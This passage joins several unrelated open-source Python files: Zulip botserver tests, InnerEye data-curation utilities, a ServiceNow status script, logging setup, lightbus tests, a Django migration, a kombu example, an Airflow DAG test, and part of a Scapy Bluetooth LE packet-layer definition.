class BotServerTests(BotServerTestCase):
class MockMessageHandler:
def handle_message(self, message: Dict[str, str], bot_handler: BotHandler) -> None:
assert message == {"key": "test message"}
class MockLibModule:
def handler_class(self) -> Any:
return BotServerTests.MockMessageHandler()
def setUp(self) -> None:
# Since initializing Client invokes `get_server_settings` that fails in the test
# environment, we need to mock it to pretend that there exists a backend.
super().setUp()
self.patch = mock.patch("zulip.Client.get_server_settings", return_value=mock.Mock())
self.patch.start()
def test_successful_request(self) -> None:
available_bots = ["helloworld"]
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
}
}
self.assert_bot_server_response(
available_bots=available_bots,
bots_config=bots_config,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="<KEY>",
),
expected_response="beep boop",
check_success=True,
)
def test_successful_request_from_two_bots(self) -> None:
available_bots = ["helloworld", "help"]
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
},
"help": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
},
}
self.assert_bot_server_response(
available_bots=available_bots,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="<KEY>",
),
expected_response="beep boop",
bots_config=bots_config,
check_success=True,
)
def test_request_for_unkown_bot(self) -> None:
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
},
}
self.assert_bot_server_response(
available_bots=["helloworld"],
event=dict(message={"content": "test message"}, bot_email="<EMAIL>"),
bots_config=bots_config,
check_success=False,
)
def test_wrong_bot_token(self) -> None:
available_bots = ["helloworld"]
bots_config = {
"helloworld": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
}
}
self.assert_bot_server_response(
available_bots=available_bots,
bots_config=bots_config,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="wrongtoken",
),
check_success=False,
)
@mock.patch("logging.error")
@mock.patch("zulip_bots.lib.StateHandler")
def test_wrong_bot_credentials(
self, mock_StateHandler: mock.Mock, mock_LoggingError: mock.Mock
) -> None:
available_bots = ["nonexistent-bot"]
bots_config = {
"nonexistent-bot": {
"email": "<EMAIL>",
"key": "123456789qwertyuiop",
"site": "http://localhost",
"token": "<KEY>",
}
}
with self.assertRaisesRegex(
SystemExit,
'Error: Bot "nonexistent-bot" doesn\'t exist. Please make '
"sure you have set up the botserverrc file correctly.",
):
self.assert_bot_server_response(
available_bots=available_bots,
event=dict(
message={"content": "@**test** test message"},
bot_email="<EMAIL>",
trigger="mention",
token="<KEY>",
),
bots_config=bots_config,
)
@mock.patch("sys.argv", ["zulip-botserver", "--config-file", "/foo/bar/baz.conf"])
def test_argument_parsing_defaults(self) -> None:
opts = parse_args()
assert opts.config_file == "/foo/bar/baz.conf"
assert opts.bot_name is None
assert opts.bot_config_file is None
assert opts.hostname == "127.0.0.1"
assert opts.port == 5002
def test_read_config_from_env_vars(self) -> None:
# We use an OrderedDict so that the order of the entries in
# the stringified environment variable is standard even on
# Python 3.7 and earlier.
bots_config = OrderedDict()
bots_config["hello_world"] = {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
}
bots_config["giphy"] = {
"email": "<EMAIL>",
"key": "value2",
"site": "http://localhost",
"token": "<KEY>",
}
os.environ["ZULIP_BOTSERVER_CONFIG"] = json.dumps(bots_config)
# No bot specified; should read all bot configs
assert server.read_config_from_env_vars() == bots_config
# Specified bot exists; should read only that section.
assert server.read_config_from_env_vars("giphy") == {"giphy": bots_config["giphy"]}
# Specified bot doesn't exist; should read the first section of the config.
assert server.read_config_from_env_vars("redefined_bot") == {
"redefined_bot": bots_config["hello_world"]
}
def test_read_config_file(self) -> None:
with self.assertRaises(IOError):
server.read_config_file("nonexistentfile.conf")
current_dir = os.path.dirname(os.path.abspath(__file__))
# No bot specified; should read all bot configs.
bot_conf1 = server.read_config_file(os.path.join(current_dir, "test.conf"))
expected_config1 = {
"helloworld": {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
},
"giphy": {
"email": "<EMAIL>",
"key": "value2",
"site": "http://localhost",
"token": "<KEY>",
},
}
assert json.dumps(bot_conf1, sort_keys=True) == json.dumps(expected_config1, sort_keys=True)
# Specified bot exists; should read only that section.
bot_conf3 = server.read_config_file(os.path.join(current_dir, "test.conf"), "giphy")
expected_config3 = {
"giphy": {
"email": "<EMAIL>",
"key": "value2",
"site": "http://localhost",
"token": "<KEY>",
}
}
assert json.dumps(bot_conf3, sort_keys=True) == json.dumps(expected_config3, sort_keys=True)
# Specified bot doesn't exist; should read the first section of the config.
bot_conf2 = server.read_config_file(os.path.join(current_dir, "test.conf"), "redefined_bot")
expected_config2 = {
"redefined_bot": {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
}
}
assert json.dumps(bot_conf2, sort_keys=True) == json.dumps(expected_config2, sort_keys=True)
def test_load_lib_modules(self) -> None:
# This testcase requires hardcoded paths, which here is a good thing so if we ever
# restructure zulip_bots, this test would fail and we would also update Botserver
# at the same time.
helloworld = import_module("zulip_bots.bots.{bot}.{bot}".format(bot="helloworld"))
root_dir = Path(__file__).parents[2].as_posix()
# load valid module name
module = server.load_lib_modules(["helloworld"])["helloworld"]
assert module == helloworld
# load valid file path
path = Path(
root_dir, "zulip_bots/zulip_bots/bots/{bot}/{bot}.py".format(bot="helloworld")
).as_posix()
module = server.load_lib_modules([path])[path]
assert module.__name__ == "custom_bot_module"
assert module.__file__ == path
assert isinstance(module, ModuleType)
# load invalid module name
with self.assertRaisesRegex(
SystemExit,
'Error: Bot "botserver-test-case-random-bot" doesn\'t exist. '
"Please make sure you have set up the botserverrc file correctly.",
):
module = server.load_lib_modules(["botserver-test-case-random-bot"])[
"botserver-test-case-random-bot"
]
# load invalid file path
with self.assertRaisesRegex(
SystemExit,
'Error: Bot "{}/zulip_bots/zulip_bots/bots/helloworld.py" doesn\'t exist. '
"Please make sure you have set up the botserverrc file correctly.".format(root_dir),
):
path = Path(
root_dir, "zulip_bots/zulip_bots/bots/{bot}.py".format(bot="helloworld")
).as_posix()
module = server.load_lib_modules([path])[path]
@mock.patch("zulip_botserver.server.app")
@mock.patch("sys.argv", ["zulip-botserver", "--config-file", "/foo/bar/baz.conf"])
def test_load_from_registry(self, mock_app: mock.Mock) -> None:
packaged_bot_module = mock.MagicMock(__version__="1.0.0", __file__="asd")
packaged_bot_entrypoint = metadata.EntryPoint(
"packaged_bot", "module_name", "zulip_bots.registry"
)
bots_config = {
"packaged_bot": {
"email": "<EMAIL>",
"key": "value",
"site": "http://localhost",
"token": "<KEY>",
}
}
with mock.patch(
"zulip_botserver.server.read_config_file", return_value=bots_config
), mock.patch("zulip_botserver.server.lib.ExternalBotHandler", new=mock.Mock()), mock.patch(
"zulip_bots.finder.metadata.EntryPoint.load",
return_value=packaged_bot_module,
), mock.patch(
"zulip_bots.finder.metadata.entry_points",
return_value=(packaged_bot_entrypoint,),
):
server.main()
mock_app.config.__setitem__.assert_any_call(
"BOTS_LIB_MODULES", {"packaged_bot": packaged_bot_module}
)
if __name__ == "__main__":
unittest.main()
|
InnerEye-DataQuality/InnerEyeDataQuality/selection/data_curation_utils.py
|
faz1993/InnerEye-DeepLearning
| 402 |
84829
|
<reponame>faz1993/InnerEye-DeepLearning
# ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
from pathlib import Path
from typing import Any, Dict, List
import numpy as np
import torch
from sklearn.metrics import roc_auc_score
from InnerEyeDataQuality.configs.config_node import ConfigNode
from InnerEyeDataQuality.deep_learning.model_inference import inference_ensemble
from InnerEyeDataQuality.deep_learning.utils import load_selector_config
from InnerEyeDataQuality.selection.selectors.base import SampleSelector
from InnerEyeDataQuality.selection.selectors.bald import BaldSelector
from InnerEyeDataQuality.selection.selectors.graph import GraphBasedSelector, GraphParameters
from InnerEyeDataQuality.selection.selectors.label_based import LabelBasedDecisionRule, PosteriorBasedSelector
from InnerEyeDataQuality.selection.simulation_statistics import get_ambiguous_sample_ids
from InnerEyeDataQuality.utils.custom_types import SelectorTypes as ST
from InnerEyeDataQuality.utils.plot import plot_model_embeddings
def evaluate_ambiguous_case_detection(bald_score: np.ndarray, labels_complete: np.ndarray) -> None:
uncertain_cases = np.zeros_like(bald_score)
true_ambiguous_cases = get_ambiguous_sample_ids(labels_complete)
uncertain_cases[true_ambiguous_cases] = 1
auc_ = roc_auc_score(y_true=uncertain_cases, y_score=bald_score)
logging.info(f'BALD ambiguous detection AUC: {float(auc_):.2f}')
def pretty_selector_name(_type: str, model_name: str) -> str:
type_dict = {'BaldSelector': None,
'PosteriorBasedSelector': None,
'PosteriorBasedSelectorJoint': 'With entropy',
'GraphBasedSelector': 'Graph'}
_type = type_dict[_type] # type: ignore
return f'{model_name} ({_type})' if _type else f'{model_name}'
def get_selector(_type: str, cfg: ConfigNode, **pars: Any) -> SampleSelector:
name = pars["name"]
num_samples = pars["dataset"].num_samples
num_classes = pars["dataset"].num_classes
sample_indices = pars["dataset"].indices
embeddings = pars["embeddings"]
avg_posteriors = pars["avg_posteriors"]
all_posteriors = pars["all_posteriors"]
output_directory = pars["output_directory"]
trainer = pars["trainer"]
use_active_relabelling = pars["use_active_relabelling"]
if ST(_type) is ST.GraphBasedSelector:
distance_metric = "cosine" if (
cfg.model.resnet.apply_l2_norm or cfg.train.use_self_supervision) else "euclidean"
graph_params = GraphParameters(n_neighbors=num_samples // 200,
diffusion_alpha=0.90,
cg_solver_max_iter=10,
diffusion_batch_size=num_samples // 200,
distance_kernel=distance_metric)
return GraphBasedSelector(num_samples, num_classes, embeddings,
sample_indices=sample_indices, name=name,
graph_params=graph_params)
elif ST(_type) is ST.BaldSelector:
return BaldSelector(posteriors=all_posteriors,
num_samples=num_samples,
num_classes=num_classes,
name=name,
trainer=trainer,
use_active_relabelling=use_active_relabelling)
elif ST(_type) is ST.PosteriorBasedSelector:
return PosteriorBasedSelector(avg_posteriors, num_samples, num_classes=num_classes, name=name,
decision_rule=LabelBasedDecisionRule.CROSS_ENTROPY,
output_directory=output_directory, trainer=trainer,
use_active_relabelling=use_active_relabelling)
elif ST(_type) is ST.PosteriorBasedSelectorJoint:
return PosteriorBasedSelector(avg_posteriors, num_samples, num_classes=num_classes, name=name,
decision_rule=LabelBasedDecisionRule.JOINT,
output_directory=output_directory, trainer=trainer,
use_active_relabelling=use_active_relabelling)
else:
raise ValueError("Unknown selector type is specified")
def get_user_specified_selectors(list_configs: List[str],
dataset: Any,
output_path: Path,
plot_embeddings: bool = False) -> Dict[str, SampleSelector]:
"""
Load the user specific configs, get the embeddings and return the selectors.
:param list_configs:
:return: dictionary of selector
"""
logging.info("Loading the selector configs:\n {0}".format('\n'.join(list_configs)))
user_specified_selectors = dict()
for cfg in [load_selector_config(cfg) for cfg in list_configs]:
# Collect model probability predictions for the given set of images in the training set.
embeddings, avg_posteriors, all_posteriors, trainer = inference_ensemble(dataset, cfg)
assert avg_posteriors.shape[0] == dataset.num_samples
if plot_embeddings:
sample_label_counts = dataset.label_counts
plot_model_embeddings(embeddings=embeddings, label_distribution=sample_label_counts,
label_names=dataset.get_label_names(), save_path=output_path)
for _type in cfg.selector.type:
selector_params = {"dataset": dataset,
"trainer": trainer if cfg.selector.use_active_relabelling else None,
"embeddings": embeddings,
"avg_posteriors": avg_posteriors,
"all_posteriors": all_posteriors,
"output_directory": cfg.selector.output_directory,
"use_active_relabelling": cfg.selector.use_active_relabelling,
"name": pretty_selector_name(_type, cfg.selector.model_name)}
selector_name = pretty_selector_name(_type, cfg.selector.model_name)
user_specified_selectors[selector_name] = get_selector(_type, cfg, **selector_params)
return user_specified_selectors
def update_trainer_for_simulation(selector: Any, seed: int) -> None:
if selector.trainer is None:
return
# check if device_id is within the range
num_gpus = torch.cuda.device_count()
device_id = seed % num_gpus
# set the device attribute in config object
selector.trainer.config.defrost()
selector.trainer.config.device = device_id
selector.trainer.config.train.seed = seed
selector.trainer.config.train.dataloader.num_workers = 0
selector.trainer.config.validation.dataloader.num_workers = 0
selector.trainer.config.freeze()
selector.trainer.device = torch.device(device_id)
# migrate all parameters to the given device
selector.trainer.models = [model.to(device_id) for model in selector.trainer.models]
|
Packs/ServiceNow/Scripts/ServiceNowIncidentStatus/ServiceNowIncidentStatus.py
|
diCagri/content
| 799 |
84841
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
COLORS = {
'1 - New': '#00CD33', # (success green)
'2 - In Progress': '#7995D4', # (royal blue)
'3 - On Hold': '#FF9000', # (warning orange)
'4 - Awaiting Caller': '#FF9000', # (warning orange)
'5 - Awaiting Evidence': '#FF9000', # (warning orange)
'6 - Resolved': '#89A5C1', # (polo)
'7 - Closed': '#9AA0A3', # (natural grey)
'8 - Canceled': '#FF1744' # (alert-red)
}
TEXT = {
'1 - New': 'New',
'2 - In Progress': 'In Progress',
'3 - On Hold': 'On-Hold',
'4 - Awaiting Caller': 'Awaiting Caller',
'5 - Awaiting Evidence': 'Awaiting Evidence',
'6 - Resolved': 'Resolved',
'7 - Closed': 'Closed',
'8 - Canceled': 'Canceled'
}
incident = demisto.incidents()
service_now_state = (incident[0].get('CustomFields', {}).get('servicenowstate'))
try:
text_color = COLORS[service_now_state]
text_content = TEXT[service_now_state]
except Exception as e:
demisto.debug(f'SnowIncidentStatus debug - state is: {service_now_state}\n{e}')
text_color = '#000000'
text_content = 'Pending Update'
html = f"<div style='color:{text_color};text-align:center;'><h2>{text_content}</h2></div>"
demisto.results({
'ContentsFormat': formats['html'],
'Type': entryTypes['note'],
'Contents': html
})
|
lycheesync/utils/boilerplatecode.py
|
bezineb5/lycheesync
| 110 |
84843
|
<filename>lycheesync/utils/boilerplatecode.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import os
import logging
from lycheesync.utils.configuration import ConfBorg
import sys
logger = logging.getLogger(__name__)
def init_loggers(logconf, verbose=False):
with open(logconf, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
logger.debug("**** logging conf -> read from: " + logconf)
if verbose:
logging.getLogger().setLevel(logging.DEBUG)
for h in logging.getLogger().handlers:
if h.name == "stream_handler":
h.setLevel(logging.DEBUG)
def script_init(cli_args):
"""
- will initialize a ConfBorg object containing cli arguments, configutation file elements
- will initialize loggers
"""
root_level = ".."
# compute log file absolute path
pathname = os.path.dirname(sys.argv[0])
full_path = os.path.abspath(pathname)
# root level is different if main.py or sync.py is used to launch script
log_conf_path = os.path.join(full_path, root_level, "ressources", 'logging.json')
log_conf_path2 = os.path.join(full_path, "ressources", 'logging.json')
# append path to configuration
cli_args['full_path'] = full_path
# read log configuration
if os.path.exists(log_conf_path):
init_loggers(log_conf_path, cli_args['verbose'])
elif os.path.exists(log_conf_path2):
init_loggers(log_conf_path2, cli_args['verbose'])
else:
# default value
logging.basicConfig(level=logging.DEBUG)
logging.warn("**** logging conf -> default conf")
# read application configuration
if os.path.exists(cli_args['confpath']):
with open(cli_args['confpath'], 'rt') as f:
conf = json.load(f)
else:
logger.warn("**** Loading default conf in ressources/conf.json")
conf_path = os.path.join(full_path, root_level, "ressources", 'conf.json')
if os.path.exists(conf_path):
with open(conf_path, 'rt') as f:
conf = json.load(f)
# initialize conf with items loaded from conf file AND command lines arguments
# cli args have priority over configuration file
z = {}
z = conf.copy()
z.update(cli_args)
borg = ConfBorg(z)
logger.debug("**** loaded configuration: ")
logger.debug("**** " + borg.pretty)
|
tests/test_api.py
|
gcollard/lightbus
| 178 |
84885
|
import pytest
from lightbus import Api, Event
from lightbus.api import ApiRegistry
from lightbus.exceptions import (
MisconfiguredApiOptions,
InvalidApiEventConfiguration,
InvalidApiRegistryEntry,
UnknownApi,
)
pytestmark = pytest.mark.unit
@pytest.fixture()
def SimpleApi():
class SimpleApi(Api):
class Meta:
name = "simple.api"
return SimpleApi
@pytest.fixture()
def registry():
return ApiRegistry()
def test_api_named_default():
# Apis can not start with the name 'default'
with pytest.raises(MisconfiguredApiOptions):
class BadApi(Api):
class Meta:
name = "default"
def test_api_named_default_dot_something():
# Apis can not start with the name 'default'
with pytest.raises(MisconfiguredApiOptions):
class BadApi(Api):
class Meta:
name = "default.foo"
def test_pass_string_as_event_params():
# Check we cannot accidentally pass a string to Event in the
# case that we omit a ',' when specifying a parameters tuple
with pytest.raises(InvalidApiEventConfiguration):
Event(parameters=("foo"))
def test_api_registry_add_ok(SimpleApi, registry):
registry.add(SimpleApi())
assert "simple.api" in registry._apis
def test_api_registry_add_class(SimpleApi, registry):
with pytest.raises(InvalidApiRegistryEntry):
registry.add(SimpleApi)
def test_api_registry_get_ok(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.get("simple.api") == api
def test_api_registry_get_unknown(SimpleApi, registry):
with pytest.raises(UnknownApi):
registry.get("unknown.api")
def test_api_registry_remove_ok(SimpleApi, registry):
registry.add(SimpleApi())
registry.remove("simple.api")
assert not registry._apis
def test_api_registry_remove_unknown(SimpleApi, registry):
with pytest.raises(UnknownApi):
registry.remove("unknown.api")
def test_api_registry_internal(registry):
class InternalApi(Api):
class Meta:
name = "internal.api"
internal = True
api = InternalApi()
registry.add(api)
assert registry.internal() == [api]
assert registry.public() == []
def test_api_registry_public(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.public() == [api]
assert registry.internal() == []
def test_api_registry_all(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.all() == [api]
def test_api_registry_names(SimpleApi, registry):
api = SimpleApi()
registry.add(api)
assert registry.names() == ["simple.api"]
|
zerver/migrations/0274_nullbooleanfield_to_booleanfield.py
|
TylerPham2000/zulip
| 17,004 |
84892
|
# Generated by Django 2.2.12 on 2020-04-26 17:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("zerver", "0273_migrate_old_bot_messages"),
]
operations = [
migrations.AlterField(
model_name="stream",
name="invite_only",
field=models.BooleanField(default=False, null=True),
),
migrations.AlterField(
model_name="subscription",
name="audible_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="desktop_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="email_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="is_muted",
field=models.BooleanField(default=False, null=True),
),
migrations.AlterField(
model_name="subscription",
name="push_notifications",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="subscription",
name="wildcard_mentions_notify",
field=models.BooleanField(default=None, null=True),
),
migrations.AlterField(
model_name="userprofile",
name="enter_sends",
field=models.BooleanField(default=False, null=True),
),
]
|
examples/simple_eventlet_send.py
|
kaiix/kombu
| 1,920 |
84932
|
<filename>examples/simple_eventlet_send.py
"""
Example that sends a single message and exits using the simple interface.
You can use `simple_receive.py` (or `complete_receive.py`) to receive the
message sent.
"""
import eventlet
from kombu import Connection
eventlet.monkey_patch()
def send_many(n):
#: Create connection
#: If hostname, userid, password and virtual_host is not specified
#: the values below are the default, but listed here so it can
#: be easily changed.
with Connection('amqp://guest:guest@localhost:5672//') as connection:
#: SimpleQueue mimics the interface of the Python Queue module.
#: First argument can either be a queue name or a kombu.Queue object.
#: If a name, then the queue will be declared with the name as the
#: queue name, exchange name and routing key.
with connection.SimpleQueue('kombu_demo') as queue:
def send_message(i):
queue.put({'hello': f'world{i}'})
pool = eventlet.GreenPool(10)
for i in range(n):
pool.spawn(send_message, i)
pool.waitall()
if __name__ == '__main__':
send_many(10)
|
ext/scheduler/airflow2/tests/test_compiled_airflow_template.py
|
siddhanta-rath/optimus
| 651 |
84935
|
<gh_stars>100-1000
import unittest
import sys
sys.path.insert(1, '../resources')
import importlib.util
def load_file_as_module(filepath):
spec = importlib.util.spec_from_file_location("dag", filepath)
compiled_dag_lib = importlib.util.module_from_spec(spec)
spec.loader.exec_module(compiled_dag_lib)
return compiled_dag_lib
class TestCompiledAirflowTemplate(unittest.TestCase):
def test_should_run_compiled_airflow_template(self):
compiled_dag_lib = load_file_as_module('../resources/expected_compiled_template.py')
dag = compiled_dag_lib.dag
self.assertEqual('foo', dag.dag_id)
self.assertEqual(5, len(dag.tasks))
self.assertEqual("bq", dag.tasks[0].task_id)
self.assertEqual("hook_transporter", dag.tasks[1].task_id)
self.assertEqual("hook_predator", dag.tasks[2].task_id)
self.assertEqual("wait_foo-intra-dep-job-bq", dag.tasks[3].task_id)
self.assertEqual("wait_foo-inter-dep-job-bq", dag.tasks[4].task_id)
self.assertEqual("SuperKubernetesPodOperator", dag.tasks[0].__class__.__name__)
self.assertEqual("SuperKubernetesPodOperator", dag.tasks[1].__class__.__name__)
self.assertEqual("SuperKubernetesPodOperator", dag.tasks[2].__class__.__name__)
self.assertEqual("SuperExternalTaskSensor", dag.tasks[3].__class__.__name__)
self.assertEqual("CrossTenantDependencySensor", dag.tasks[4].__class__.__name__)
|
03_SweynTooth/libs/scapy/layers/bluetooth4LE.py
|
Charmve/BLE-Security-Att-Def
| 149 |
84941
|
<filename>03_SweynTooth/libs/scapy/layers/bluetooth4LE.py
# This file is for use with Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Airbus DS CyberSecurity
# Authors: <NAME>, <NAME>, <NAME>
# This program is published under a GPLv2 license
"""Bluetooth 4LE layer"""
import struct
from scapy.modules.six.moves import range
from scapy.compat import orb, chb
from scapy.config import conf
from scapy.data import DLT_BLUETOOTH_LE_LL, DLT_BLUETOOTH_LE_LL_WITH_PHDR, DLT_NORDIC_BLE, \
PPI_BTLE
from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \
Field, FlagsField, LEIntField, LEShortEnumField, LEShortField, StrFixedLenField, \
MACField, PacketListField, SignedByteField, LEX3BytesField, \
XBitField, XByteField, XShortField, XLEIntField, XLEShortField
from scapy.layers.bluetooth import EIR_Hdr, L2CAP_Hdr
from scapy.layers.ppi import PPI_Element, PPI_Hdr
from scapy.packet import Packet, bind_layers
from scapy.utils import mac2str, str2mac
####################
# Transport Layers #
####################
class BTLE_PPI(PPI_Element):
"""Cooked BTLE PPI header
See ``ppi_btle_t`` in
https://github.com/greatscottgadgets/libbtbb/blob/master/lib/src/pcap.c
"""
name = "BTLE PPI header"
fields_desc = [
ByteField("btle_version", 0),
# btle_channel is a frequency in MHz. Named for consistency with
# other users.
LEShortField("btle_channel", None),
ByteField("btle_clkn_high", None),
LEIntField("btle_clk_100ns", None),
SignedByteField("rssi_max", None),
SignedByteField("rssi_min", None),
SignedByteField("rssi_avg", None),
ByteField("rssi_count", None)
]
class BTLE_RF(Packet):
"""Cooked BTLE link-layer pseudoheader.
http://www.whiterocker.com/bt/LINKTYPE_BLUETOOTH_LE_LL_WITH_PHDR.html
"""
name = "BTLE RF info header"
fields_desc = [
ByteField("rf_channel", 0),
SignedByteField("signal", -128),
SignedByteField("noise", -128),
ByteField("access_address_offenses", 0),
XLEIntField("reference_access_address", 0),
FlagsField("flags", 0, -16, [
"dewhitened", "sig_power_valid", "noise_power_valid",
"decrypted", "reference_access_address_valid",
"access_address_offenses_valid", "channel_aliased",
"res1", "res2", "res3", "crc_checked", "crc_valid",
"mic_checked", "mic_valid", "res4", "res5"
])
]
class NORDIC_BLE(Packet):
"""Cooked Nordic BTLE link-layer pseudoheader.
"""
name = "BTLE Nordic info header"
fields_desc = [
ByteField("board", 0),
LEShortField("payload_len", None),
ByteField("protocol", 0),
LEShortField("packet_counter", 0),
ByteField("packet_id", 0),
ByteField("packet_len", 10),
ByteField("flags", 0),
ByteField("channel", 0),
ByteField("rssi", 0),
LEShortField("event_counter", 0),
LEIntField("delta_time", 0),
]
def post_build(self, p, pay):
if self.payload_len is None:
p = p[:1] + chb(len(pay) + 10) + p[2:]
return p + pay
##########
# Fields #
##########
class BDAddrField(MACField):
def __init__(self, name, default, resolve=False):
MACField.__init__(self, name, default)
if resolve:
conf.resolve.add(self)
def i2m(self, pkt, x):
if x is None:
return b"\0\0\0\0\0\0"
return mac2str(':'.join(x.split(':')[::-1]))
def m2i(self, pkt, x):
return str2mac(x[::-1])
class BTLEChanMapField(XByteField):
def __init__(self, name, default):
Field.__init__(self, name, default, "<Q")
def addfield(self, pkt, s, val):
return s + struct.pack(self.fmt, self.i2m(pkt, val))[:5]
def getfield(self, pkt, s):
return s[5:], self.m2i(pkt, struct.unpack(self.fmt, s[:5] + b"\x00\x00\x00")[0]) # noqa: E501
##########
# Layers #
##########
class BTLE(Packet):
name = "BT4LE"
fields_desc = [
XLEIntField("access_addr", 0x8E89BED6),
LEX3BytesField("crc", None)
]
@staticmethod
def compute_crc(pdu, init=0x555555):
def swapbits(a):
v = 0
if a & 0x80 != 0:
v |= 0x01
if a & 0x40 != 0:
v |= 0x02
if a & 0x20 != 0:
v |= 0x04
if a & 0x10 != 0:
v |= 0x08
if a & 0x08 != 0:
v |= 0x10
if a & 0x04 != 0:
v |= 0x20
if a & 0x02 != 0:
v |= 0x40
if a & 0x01 != 0:
v |= 0x80
return v
state = swapbits(init & 0xff) + (swapbits((init >> 8) & 0xff) << 8) + (
swapbits((init >> 16) & 0xff) << 16) # noqa: E501
lfsr_mask = 0x5a6000
for i in (orb(x) for x in pdu):
for j in range(8):
next_bit = (state ^ i) & 1
i >>= 1
state >>= 1
if next_bit:
state |= 1 << 23
state ^= lfsr_mask
return struct.pack("<L", state)[:-1]
def post_build(self, p, pay):
# Switch payload and CRC
crc = p[-3:]
p = p[:-3] + pay
p += crc if self.crc is not None else self.compute_crc(p[4:])
return p
def post_dissect(self, s):
self.raw_packet_cache = None # Reset packet to allow post_build
return s
def pre_dissect(self, s):
# move crc
return s[:4] + s[-3:] + s[4:-3]
def hashret(self):
return struct.pack("!L", self.access_addr)
class BTLE_ADV(Packet):
name = "BTLE advertising header"
fields_desc = [
BitEnumField("RxAdd", 0, 1, {0: "public", 1: "random"}),
BitEnumField("TxAdd", 0, 1, {0: "public", 1: "random"}),
BitField("RFU", 0, 2), # Unused
BitEnumField("PDU_type", 0, 4,
{0: "ADV_IND", 1: "ADV_DIRECT_IND", 2: "ADV_NONCONN_IND", 3: "SCAN_REQ", # noqa: E501
4: "SCAN_RSP", 5: "CONNECT_REQ", 6: "ADV_SCAN_IND"}), # noqa: E501
BitField("unused", 0, 2), # Unused
XBitField("Length", None, 6),
]
def post_build(self, p, pay):
p += pay
if self.Length is None:
if len(pay) > 2:
l_pay = len(pay)
else:
l_pay = 0
p = p[:1] + chb(l_pay & 0x3f) + p[2:]
if not isinstance(self.underlayer, BTLE):
self.add_underlayer(BTLE)
return p
class BTLE_DATA(Packet):
name = "BTLE data header"
fields_desc = [
BitField("RFU", 0, 3), # Unused
BitField("MD", 0, 1),
BitField("SN", 0, 1),
BitField("NESN", 0, 1),
BitEnumField("LLID", 0, 2, {1: "continue", 2: "start", 3: "control"}),
ByteField("len", None), # BLE 4.2 and upwards can use 1 entire byte for length
]
def post_build(self, p, pay):
if self.len is None:
p = p[:-1] + chb(len(pay))
return p + pay
def do_dissect_payload(self, s):
if s is not None:
cls = self.guess_payload_class(s)
try:
p = cls(s, _internal=1, _underlayer=self)
except KeyboardInterrupt:
raise
except Exception:
if conf.debug_dissector:
if issubtype(cls, Packet):
log_runtime.error("%s dissector failed" % cls.__name__)
else:
log_runtime.error("%s.guess_payload_class() returned [%s]" % (
self.__class__.__name__, repr(cls))) # noqa: E501
if cls is not None:
raise
p = conf.raw_layer(s, _internal=1, _underlayer=self)
self.add_payload(p)
class BTLE_EMPTY_PDU(Packet):
name = "Empty data PDU"
class BTLE_ADV_IND(Packet):
name = "BTLE ADV_IND"
fields_desc = [
BDAddrField("AdvA", None),
PacketListField("data", None, EIR_Hdr)
]
class BTLE_ADV_DIRECT_IND(Packet):
name = "BTLE ADV_DIRECT_IND"
fields_desc = [
BDAddrField("AdvA", None),
BDAddrField("InitA", None)
]
class BTLE_ADV_NONCONN_IND(BTLE_ADV_IND):
name = "BTLE ADV_NONCONN_IND"
class BTLE_ADV_SCAN_IND(BTLE_ADV_IND):
name = "BTLE ADV_SCAN_IND"
class BTLE_SCAN_REQ(Packet):
name = "BTLE scan request"
fields_desc = [
BDAddrField("ScanA", None),
BDAddrField("AdvA", None)
]
def answers(self, other):
return BTLE_SCAN_RSP in other and self.AdvA == other.AdvA
class BTLE_SCAN_RSP(Packet):
name = "BTLE scan response"
fields_desc = [
BDAddrField("AdvA", None),
PacketListField("data", None, EIR_Hdr)
]
def answers(self, other):
return BTLE_SCAN_REQ in other and self.AdvA == other.AdvA
class BTLE_CONNECT_REQ(Packet):
name = "BTLE connect request"
fields_desc = [
BDAddrField("InitA", None),
BDAddrField("AdvA", None),
# LLDATA
XLEIntField("AA", 0x00),
LEX3BytesField("crc_init", 0x0),
XByteField("win_size", 0x0),
XLEShortField("win_offset", 0x0),
XLEShortField("interval", 0x0),
XLEShortField("latency", 0x0),
XLEShortField("timeout", 0x0),
BTLEChanMapField("chM", 0),
BitField("SCA", 0, 3),
BitField("hop", 0, 5),
]
BTLE_Versions = {
6: '4.0',
7: '4.1',
8: '4.2',
9: '5.0',
10: '5.1',
}
BTLE_Versions_Supported_Opcode = {
'4.0': 0x0B,
}
BTLE_Corp_IDs = {
0xf: 'Broadcom Corporation',
0x59: 'Nordic Semiconductor ASA'
}
BTLE_CtrlPDU_optcode = {
